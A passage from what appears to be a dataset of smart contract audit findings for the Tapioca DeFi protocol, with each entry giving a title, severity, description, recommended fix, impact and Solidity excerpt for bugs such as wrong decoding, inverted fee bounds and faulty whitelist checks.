lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n -`getCollateral` and `getAsset` functions of the AssetTotsDaiLeverageExecutor contract decode data incorrectlyчmediumчSee vulnerability detail\\nIn AssetTotsDaiLeverageExecutor contract, `getCollateral` function decodes the data before passing it to `_swapAndTransferToSender` function.\\n```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n\\nHowever, `_swapAndTransferToSender` will decode this data again to obtain the swapperData:\\n```\\nfunction _swapAndTransferToSender(\\n bool sendBack,\\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn,\\n bytes memory data\\n) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\n // rest of code\\n```\\n\\nThe redundant decoding will cause the data to not align as expected, which is different from `SimpleLeverageExecutor.getCollateral()` function (code snippet)чThe AssetTotsDaiLeverageExecutor contract should pass data directly to `_swapAndTransferToSender`, similar to the SimpleLeverageExecutor contractч`getCollateral` and `getAsset` of AssetTotsDaiLeverageExecutor will not work as intended due to incorrectly decoding data.ч```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n -Balancer using safeApprove may lead to revert.чmediumчWhen executing `Balancer._routerSwap()`, the `oz` `safeApprove` function is used to set an allowance. Due to the presence of the `convertRate` in the `router`, `Balancer._routerSwap()` rounds down the incoming quantity. This behavior may result in the allowance not being fully use, causing a subsequent execution of `oz.safeApprove()` to revert.\\nThe code snippet for `Balancer._routerSwap()` is as follows:\\n```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n }\\n```\\n\\nIn the above code, `SafeERC20.safeApprove()` from the `oz` library is used, but the allowance is not cleared afterward. Consequently, if the current allowance is not fully use during this transaction, a subsequent execution of `SafeERC20.safeApprove()` will revert.\\n```\\n function swap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n uint256 _amountLD,\\n uint256 _minAmountLD,\\n lzTxObj memory _lzTxParams,\\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable override nonReentrant {\\n require(_amountLD > 0, \"Stargate: cannot swap 0\");\\n require(_refundAddress != address(0x0), \"Stargate: _refundAddress cannot be 0x0\");\\n Pool.SwapObj memory s;\\n Pool.CreditObj memory c;\\n {\\n Pool pool = _getPool(_srcPoolId);\\n {\\n uint256 convertRate = pool.convertRate();\\n _amountLD = _amountLD.div(convertRate).mul(convertRate);\\n }\\n\\n s = pool.swap(_dstChainId, _dstPoolId, msg.sender, _amountLD, _minAmountLD, true);\\n _safeTransferFrom(pool.token(), msg.sender, address(pool), _amountLD);\\n c = pool.sendCredits(_dstChainId, _dstPoolId);\\n }\\n bridge.swap{value: msg.value}(_dstChainId, _srcPoolId, _dstPoolId, _refundAddress, c, s, _lzTxParams, _to, _payload);\\n }\\n```\\nч```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n// Add the line below\\n IERC20(_erc20).safeApprove(address(router), 0);\\n```\\nчUnused allowance may lead to failure in subsequent `_routerSwap()` executions.ч```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\"\\n );\\n }\\n```\\n -buyCollateral() does not work properlyчmediumчThe `BBLeverage.buyCollateral()` function does not work as expected.\\nThe implementation of `BBLeverage.buyCollateral()` is as follows:\\n```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n\\nThe code above has several issues:\\n`leverageExecutor.getCollateral()` receiver should be `address(this)`. ---> for 2th step deposit to YB\\n`address(asset).safeApprove()` should use `address(collateral).safeApprove()`.\\n`yieldBox.depositAsset()` receiver should be `calldata_.from`. ----> for next execute addCollateral(calldata.from)\\nNote: SGLLeverage.sol have same issueч```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n// rest of code.\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount // Add the line below\\n memoryData.borrowShareToAmount,\\n// Remove the line below\\n calldata_.from,\\n// Add the line below\\n address(this),\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n// Remove the line below\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), 0);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), type(uint256).max);\\n// Add the line below\\n yieldBox.depositAsset(collateralId, address(this), calldata_.from, 0, collateralShare);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\nч`buyCollateral()` does not work properly.ч```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n -DoS in BBLeverage and SGLLeverage due to using wrong leverage executor interfaceчmediumчA DoS takes place due to utilizing a wrong interface in the leverage modules.\\n`BBLeverage.sol` and `SGLLeverage.sol` use a wrong interface to interact with the `leverageExecutor` contract. This will make the `sellCollateral()` and `buyCollateral()` functions always fail and render the `BBLeverage.sol` and `SGLLeverage.sol` unusable.\\nAs we can see in the following snippets, when these contracts interact with the `leverageExecutor` to call its `getAsset()` and `getCollateral()` functions, they do it passing 6 parameters in each of the functions:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n\\nHowever, the leverage executor's `getAsset()` and `getCollateral()` functions have just 4 parameters, as seen in the `BaseLeverageExecutor.sol` base contract used to build all leverage executors:\\n```\\n// BaseLeverageExecutor.sol\\n\\n/**\\n * @notice Buys an asked amount of collateral with an asset using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param assetAddress asset address.\\n * @param collateralAddress collateral address.\\n * @param assetAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getCollateral(address assetAddress, address collateralAddress, uint256 assetAmountIn, bytes calldata data)\\n external\\n payable\\n virtual\\n returns (uint256 collateralAmountOut)\\n {}\\n\\n /**\\n * @notice Buys an asked amount of asset with a collateral using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param collateralAddress collateral address.\\n * @param assetAddress asset address.\\n * @param collateralAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getAsset(address collateralAddress, address assetAddress, uint256 collateralAmountIn, bytes calldata data)\\n external\\n virtual\\n returns (uint256 assetAmountOut)\\n {}\\n```\\nчUpdate the interface used in BBLeverage.sol and SGLLeverage.sol and pass the proper parameters so that calls can succeed.чHigh. Calls to the leverage modules will always fail, rendering these features unusable.ч```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n -Variable opening fee will always be wrongly computed if collateral is not a stablecoinчmediumчBorrowing fees will be computed wrongly because of a combination of hardcoded values and a wrongly implemented setter function.\\nTapioca applies a linearly scaling creation fee to open a new CDP in Big Bang markets. This is done via the internal `_computeVariableOpeningFee()` function every time a new borrow is performed.\\nIn order to compute the variable fee, the exchange rate will be queried. This rate is important in order to understand the current price of USDO related to the collateral asset.\\nIf `_exchangeRate >= minMintFeeStart`, then `minMintFee` will be applied.\\nIf `_exchangeRate <= maxMintFeeStart`, then `maxMintFee` will be applied\\nOtherwise, a proportional percentage will be applied to compue the fee\\nAs per the comment in the code snippet shows below, Tapioca wrongly assumes that the exchange rate will always be `USDO <> USDC`, when in reality the actual collateral will dictate the exchange rate returned.\\nIt is also important to note the fact that contrary to what one would assume, `maxMintFeeStart` is assumed to be smaller than `minMintFeeStart` in order to perform the calculations:\\n```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n\\nIt is also important to note that `minMintFeeStart` and `maxMintFeeStart` are hardcoded when being initialized inside `BigBang.sol` (as mentioned, `maxMintFeeStart` is smaller than minMintFeeStart):\\n```\\n// BigBang.sol\\n\\nfunction _initCoreStorage(\\n IPenrose _penrose,\\n IERC20 _collateral,\\n uint256 _collateralId,\\n ITapiocaOracle _oracle,\\n uint256 _exchangeRatePrecision,\\n uint256 _collateralizationRate,\\n uint256 _liquidationCollateralizationRate,\\n ILeverageExecutor _leverageExecutor\\n ) private {\\n // rest of code\\n \\n maxMintFeeStart = 975000000000000000; // 0.975 *1e18\\n minMintFeeStart = 1000000000000000000; // 1*1e18\\n\\n // rest of code\\n } \\n```\\n\\nWhile the values hardcoded initially to values that are coherent for a USDO <> stablecoin exchange rate, these values won't make sense if we find ourselves fetching an exchcange rate of an asset not stable.\\nLet's say the collateral asset is ETH. If ETH is at 4000$, then the exchange rate will return a value of 0,00025. This will make the computation inside `_computeVariableOpeningFee()` always apply the maximum fee when borrowing because `_exchangeRate` is always smaller than `maxMintFeeStart` by default.\\nAlthough this has an easy fix (changing the values stored in `maxMintFeeStart` and minMintFeeStart), this can't be properly done because the `setMinAndMaxMintRange()` function wrongly assumes that `minMintFeeStart` must be smaller than `maxMintFeeStart` (against what the actual calculations dictate in the _computeVariableOpeningFee()):\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n if (_min >= _max) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nThis will make it impossible to properly update the `maxMintFeeStart` and `minMintFeeStart` to have proper values because if it is enforced that `maxMintFeeStart` > than `minMintFeeStart`, then `_computeVariableOpeningFee()` will always enter the first `if (_exchangeRate >= minMintFeeStart)` and wrongly return the minimum fee.чThe mitigation for this is straightforward. Change the `setMinAndMaxMintRange()` function so that `_max` is enforced to be smaller than _min:\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n// Remove the line below\\n if (_min >= _max) revert NotValid(); \\n// Add the line below\\n if (_max >= _min) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nAlso, I would recommend not to hardcode the values of `maxMintFeeStart` and `minMintFeeStart` and pass them as parameter instead, inside `_initCoreStorage()` , as they should always be different considering the collateral configured for that market.чMedium. Although this looks like a bug that doesn't have a big impact in the protocol, it actually does. The fees will always be wrongly applied for collaterals different from stablecoins, and applying these kind of fees when borrowing is one of the core mechanisms to keep USDO peg, as described in Tapioca's documentation. If this mechanisms doesn't work properly, users won't be properly incentivized to borrow/repay considering the different market conditions that might take place and affect USDO's peg to $1.ч```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n -Not properly tracking debt accrual leads mintOpenInterestDebt() to lose twTap rewardsчmediumчDebt accrual is tracked wrongly, making the expected twTap rewards to be potentially lost.\\nPenrose's `mintOpenInterestDebt()` function allows USDO to be minted and distributed as a reward to twTap holders based on the current USDO open interest.\\nIn order to mint and distribute rewards, `mintOpenInterestDebt()` will perform the following steps:\\nQuery the current `USDO.supply()`\\nCompute the total debt from all the markets (Origins included)\\nIf `totalUsdoDebt > usdoSupply`, then distribute the difference among the twTap holders\\n```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n\\nThis approach has two main issues that make the current reward distribution malfunction:\\nBecause debt is not actually tracked and is instead directly queried from the current total borrows via `computeTotalDebt()`, if users repay their debt prior to a reward distribution this debt won't be considered for the fees, given that fees will always be calculated considering the current `totalUsdoDebt` and `usdoSupply`.\\nBridging USDO is not considered\\nIf USDO is bridged from another chain to the current chain, then the `usdoToken.totalSupply()` will increment but the `totalUsdoDebt()` won't. This will make rewards never be distributed because `usdoSupply` will always be greater than `totalUsdoDebt`.\\nOn the other hand, if USDO is bridged from the current chain to another chain, the `usdoToken.totalSupply()` will decrement and tokens will be burnt, while `totalUsdoDebt()` will remain the same. This will make more rewards than the expected ones to be distributed because `usdoSupply` will be way smaller than `totalUsdoDebt`.\\nConsider the following scenario: 1000 USDO are borrowed, and already 50 USDO have been accrued as debt.\\nThis makes USDO's totalSupply() to be 1000, while `totalUsdoDebt` be 1050 USDO. If `mintOpenInterestDebt()` is called, 50 USDO should be minted and distributed among twTap holders.\\nHowever, prior to executing `mintOpenInterestDebt()`, a user bridges 100 USDO from chain B, making the total supply increment from 1000 USDO to 1100 USDO. Now, totalSupply() is 1100 USDO, while `totalUsdoDebt` is still 1050, making rewards not be distributed among users because `totalUsdoDebt` < usdoSupply.чOne of the possible fixes for this issue is to track debt with a storage variable. Every time a repay is performed, the difference between elastic and base could be accrued to the variable, and such variable could be decremented when the fees distributions are performed. This makes it easier to compute the actual rewards and mitigates the cross-chain issue.чMedium. The fees to be distributed in twTap are likely to always be wrong, making one of the core governance functionalities (locking TAP in order to participate in Tapioca's governance) be broken given that fee distributions (and thus the incentives to participate in governance) won't be correct.ч```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n -USDO's MSG_TAP_EXERCISE compose messages where exercised options must be withdrawn to another chain will always fail due to wrongly requiring sendParam's to address to be whitelisted in the ClusterчmediumчWrongly checking for the sendParam's `to` address `to` be whitelisted when bridging exercised options will make such calls always fail.\\nOne of the compose messages allowed in USDO is `MSG_TAP_EXERCISE`. This type of message will trigger UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function, which allows users to exercise their options and obtain the corresponding exercised tapOFTs.\\nUsers can choose to obtain their tapOFTs in the chain where `exerciseOptionsReceiver()` is being executed, or they can choose to send a message to a destination chain of their choice. If users decide to bridge the exercised option, the `lzSendParams` fields contained in the `ExerciseOptionsMsg` struct decoded from the `_data` passed as parameter in `exerciseOptionsReceiver()` should be filled with the corresponding data to perform the cross-chain call.\\nThe problem is that the `exerciseOptionsReceiver()` performs an unnecessary validation that requires the `to` parameter inside the `lzSendParams` `to` be whitelisted in the protocol's cluster:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n\\n`msg_.lzSendParams.sendParam.to` corresponds to the address that will obtain the tokens in the destination chain after bridging the exercised option, which can and should actually be any address that the user exercising the option decides, so this address shouldn't be required to be whitelisted in the protocol's Cluster (given that the Cluster only whitelists certain protocol-related addresses such as contracts or special addresses).\\nBecause of this, transactions where users try to bridge the exercised options will always fail because the `msg_.lzSendParams.sendParam.to` address specified by users will never be whitelisted in the Cluster.чRemove the whitelist check against the `msg_.lzSendParams.sendParam.to` param inexerciseOptionsReceiver():\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n// Remove the line below\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); \\n // rest of code\\n \\n \\n }\\n```\\nчHigh. The functionality of exercising options and bridging them in the same transaction is one of the wide range of core functionalities that should be completely functional in Tapioca. However, this functionality will always fail due to the mentioned issue, forcing users to only be able to exercise options in the same chain.ч```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n -Withdrawing to other chain when exercising options won't work as expected, leading to DoSчmediumчWithdrawing to another chain when exercising options will always fail because the implemented functionality does not bridge the tokens exercised in the option, and tries to perform a regular cross-chain call instead.\\nTapioca incorporates a DAO Share Options (DSO) program where users can lock USDO in order to obtain TAP tokens at a discounted price.\\nIn order to exercise their options, users need to execute a compose call with a message type of `MSG_TAP_EXERCISE`, which will trigger the UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function.\\nWhen exercising their options, users can decide to bridge the obtained TAP tokens into another chain by setting the `msg_.withdrawOnOtherChain` to true:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n\\nAs the code snippet shows, `exerciseOptionsReceiver()` will perform mainly 2 steps:\\nExercise the option by calling `_options.target.exerciseOption()` . This will make USDO tokens serving as a payment for the `tapOft` tokens be transferred from the user, and in exchange the corresponding option `tapOft` tokens will be transferred to the USDO contract so that they can later be transferred to the user.\\nTAP tokens will be sent to the user. This can be done in two ways:\\nIf the user doesn't decide to bridge them (by leaving `msg_.withdrawOnOtherChain` as false), the `tapOft` tokens will simply be transferred to the `_options.from` address, 